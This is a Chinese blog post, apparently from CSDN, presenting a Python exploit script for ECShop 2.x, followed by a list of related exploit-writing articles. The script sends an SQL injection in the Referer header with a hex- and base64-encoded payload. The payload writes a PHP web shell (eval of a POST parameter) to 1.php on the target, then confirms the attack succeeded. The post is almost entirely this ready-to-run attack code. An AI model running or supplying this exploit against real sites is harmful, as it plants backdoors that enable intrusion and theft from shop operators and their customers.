python学习之ecshop exp编写

最新推荐文章于 2024-04-26 12:01:11 发布
最新推荐文章于 2024-04-26 12:01:11 发布
阅读量493 收藏
点赞数 1
分类专栏: python学习 文章标签: exp编写
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws13129/article/details/90814985
版权

python学习之ecshop exp编写

针对ecshop 2.x,漏洞分析请查看网上分析,不再赘述。
# -*- coding:utf-8 -*-


import requests
import time

def ecshop(url):
    time.sleep(5)
    url_exp=url+"/user.php"
    a = "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}"
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
               'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'Referer': a,
               'Accept-Encoding': 'gzip, deflate'}

    header={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 \
                            (KHTML, like Gecko) Chrome/51.0.    2704.103 Safari/537.36"}
   # m = requests.get(url=url, headers=headers)

    try:
        s=requests.get(url_exp,header)
        if(s.status_code==200):
            print("漏洞文件存在,开始验证")
            time.sleep(5)
            m = requests.get(url=url_exp, headers=headers)

           # print("开始验证")
            url=url+"/1.php"
            url_index=requests.get(url)
            time.sleep(3)
            if(url_index.status_code==200):
                print("攻击成功,请访问 \n"+url)
            else:
                print("失败,请人工检测")
        else:
            print("漏洞不存在")
    except:
        print("网络出错")

if __name__ == '__main__':
    ecshop("http://www.ecshop.kk")

不要问我为什么加延迟,因为逼格高

cxk331
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python编写EXP/POC速成小记
U_U520的博客
02-22 1926
find() 方法检测字符串中是否包含子字符串 str ,如果指定 beg(开始) 和 end(结束) 范围,则检查是否包含在指定范围内,如果包含子字符串返回开始的索引值,否则返回-1。上述脚本存在误报,就是payload只有一个单引号闭合,没办法检验数字型sql,双引号型,’)型,’))等在payload中多加几个类型,可以直接导入自己的FUZZ字典。漏洞刚被批漏之后,有时候现有的工具里面是没有相应的EXP的,那我们可以根据原理写出对应的EXP代码,验证漏洞是否存在。不然会出现报错不适用。
python实现定制EXP
weixin_51693574的博客
01-31 928
python实现定制EXP 一、POC和EXP 四个常见概念: POC:(Proof of Concept)概念验证,常指一段漏洞证明的代码。 作用:用来证明漏洞存在的(无害的) EXP:(Exploit)利用,指利用系统漏洞进行攻击的动作。 作用:用来利用漏洞的(有害的) Payload:(攻击载荷,指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:Payload的一种,由于其建立正向/反向shell而得名。 一个形象的比喻: 想象自己是特工,你目标是监控一个重要的
ECShop 2 3 全系列版本远程代码执行高危漏洞EXP
赵一舟的博客
09-04 498
分析原文:ECShop全系列版本远程代码执行 ECSHOP RCE :VULNSPY实验-ECShop <= 2.7.x 全系列版本远程代码执行 复现地址:https://www.vsplate.com/?github=vulnspy/ECShop_2.7.3_UTF8_installed&autogo=1 sql原型,基于order by limit后的注入: SELECT ...
POC&EXP编写EXP编写实战(1)
最新发布
剁椒鱼头没剁椒的博客
04-26 601
通过上一篇文章的了解,应该都了解了POC是怎么编写的,而且POC和EXP的区别就是POC只能验证漏洞,简单来说就是通过判断特定的响应值来判断是否存在漏洞,而且EXP就需要将响应的内容给返回回来,但是整体在编写的时候基本上都差不多!关于用的模块或者参数除非是前面没了解过的,否则不再进行赘述,请查看前面的文章!整体来说,当你编写一个POC或EXP后,后续的编写基本上都是套模板,除非遇到一些很复杂的漏洞,可能需要修改很多内容,否则一般的漏洞基本上就是修改模板。
exp编写小技巧
m0_49959202的博客
09-20 2895
文章目录exp编写小技巧1.代码对齐2. 填充为指定长度3. 链接远程服务器或者链接本地文件4. 格式转换5. 环境变量6. 获得汇编指令的机器代码7. 把权限交给用户8. shellcode9. ELF 操作ELF文件的工具11.接收数据12.发送数据13.填充字符,字符串向右/向左填充14.寻找ROP15.使用flat()函数来格式化payload16.gdb调试exp17.泄露libc常用函数18.获取libc版本方法19.寻找文件中字符串20.栈溢出确定偏移量方法20.1 方法一:gdb手工计算20
Python编写EXP
weixin_41489908的博客
08-10 2321
高考过后,你不用告诉我你考多少分,悲喜之后也不要告诉我你志愿填了哪里,只要告诉我最后去了哪?我坐火车或飞机要多久,在此停留能否蹭口饭吃,一本二本我真的分不清楚,我只知道你是我朋友。。。 ---- 网易云热评 一、环境 1、python3 2、用到的模块requests 二、requests模块应用 1、获取网页的内容 # coding=utf-8 import requests res=requests.get("http://192.168.1.129/html/1.html")..
ECSHOP最新ODAY EXP工具
05-10
"ECSHOP最新ODAY EXP工具"显然指的是针对ECSHOP的一个安全漏洞利用工具,"ODAY"可能是指“零日攻击”(Zero-day exploit),即在软件厂商了解并发布补丁之前就被发现并利用的安全漏洞。 零日攻击通常由黑客发现并...
学习ECSHOP标签集合之六脉神剑.pdf
10-05
ECSHOP标签集合之六脉神剑】是一份关于ECSHOP模板系统深入学习的教程,主要讲解了ECSHOP中各种标签的使用方法和技巧,旨在帮助开发者更好地理解和定制ECSHOP的前端展示。ECSHOP是一款开源的电商建站系统,其强大的...
php 无限级分类学习参考之对ecshop无限级分类的解析 带详细注释
12-18
本文将深入解析如何在PHP中实现无限级分类,特别是针对ECShop的分类数据进行解析,通过提供的`cat_options`函数来理解和学习这个过程。 `cat_options`函数的主要作用是递归地遍历一个分类数组,并生成带有缩进级别...
B2C独立网店系统ecshop学习资料及模版合集
07-22
教程名称:B2C独立网店系统ecshop学习资料及模版合集     课程目录: 【】ecshop_函数列表大全 模板制作必备 【】Ecshop文件结构 【】ecshop模板2.7.2 【】smpss 进销存管理系统 php...
ecshop二次开发之购物车分析
09-28
主要为大家介绍了ecshop二次开发中购物车数据的存储与读写,以实例形式详细描述了针对购物车数据的保存方法及读写方法的修改技巧,具有一定的参考借鉴价值,需要的朋友可以参考下
简单的Poc Exp编写(上)
dfdhxb995397的博客
05-26 1069
简单的POC EXP编写(上) 作者BY Greekn 今天主要讲的是关于web方面的poc编写 关于web安全个人理解的话 一个就是攻击另一个就是漏洞挖掘了防御的话看自己的经验了 攻击的话不管自己黑的漫天飞也是利用别人的工具或者漏洞罢了 这样只会攻击的话我们是学不会指哪打哪的所以我们就需要掌握漏洞...
exp编写笔记
qq_42863961的博客
08-19 330
能帮到你的话,就给个赞吧 ???? python2 -c “print ‘A’*44 + ‘\x59\x86\x04\x08’” | ./ret2win32:python2 -c 是执行代码。| :管道
编写poc和exploit的几款常用工具介绍
koozxcv的博客
06-12 1万+
1.pwntools pwntools是一个CTF框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。 pwntools对Ubuntu 12.04和14.04的支持最好,但是绝大多数的功能也支持Debian, Arch, FreeBSD, OSX, 等等。 sudo pip install pwntools即可安装
python学习exp整合
cxk
06-10 960
python学习exp整合 将上述的三个exp利用脚本整合为一个,简单的cms漏洞识别利用功能 使用方法 python demo.py "url" # -*- coding:utf-8 -*- import urllib import urllib.request import requests import os import hashlib #import test.py import ...
ecshop漏洞修复整理
热门推荐
龚清林的博客
06-01 6万+
1、ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库。 路径:/api/client/api.php、/api/client/includes/lib_api.php 参照以下修改: function API_UserLogin($post) { /* SQL注入过滤 ...
ecshop常见漏洞
free_xiaochen的博客
10-13 6708
ECSHOP 常见注入漏洞分析和修复方法     优易软件为大家整理 一些ecshop 常见注入漏洞分析和修复方法,在对ecshop使用操作上能够得到一些便利。 1.测试版本 v2.7.3 RELEASE 20121106(最新) v2.7.3 RELEASE 20120411 2.漏洞条件 需登录到后台
一个刷乌云rank的思路
乐枕的家
12-02 2209
发现wooyun的高rank大牛们,除了非常6连续提交高质量漏洞的,大部分都是批量发现.若要快速提升wooyun rank的话,找一些poc简单明确且危害高的老洞,为它们做批量是一种不错的选择. 以下为新手刚入乌云的一点愚见,还望大牛指点. 漏洞选择 刷rank的思路不是"发掘漏洞",而是"利用漏洞" 在漏洞的选择上,我们注意以下几点: 自己能驾驭(能手动验证)POC
ecshop中添加页面,并且实现后台管理
kyjb的专栏
07-10 1万+
后台一共需要修改下面的四个文件C:/Program Files/ShopEx/shop/docroot/ecshop/admin/template.phpC:/Program Files/ShopEx/shop/docroot/ecshop/admin/includes/lib_template.phpC:/Program Files/ShopEx/shop/docroot/ecshop/languages/zh_cn/admin/template.phpC:/Program Files/ShopE
python自动化做ecshop测试_Python-自动化测试面试
06-10
Python中,我们可以使用Selenium WebDriver来进行ECShop的自动化测试。以下是一些步骤: 1. 安装Selenium WebDriver和浏览器驱动(如ChromeDriver)。 2. 使用WebDriver启动浏览器,导航到ECShop网站。 3. 在网站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值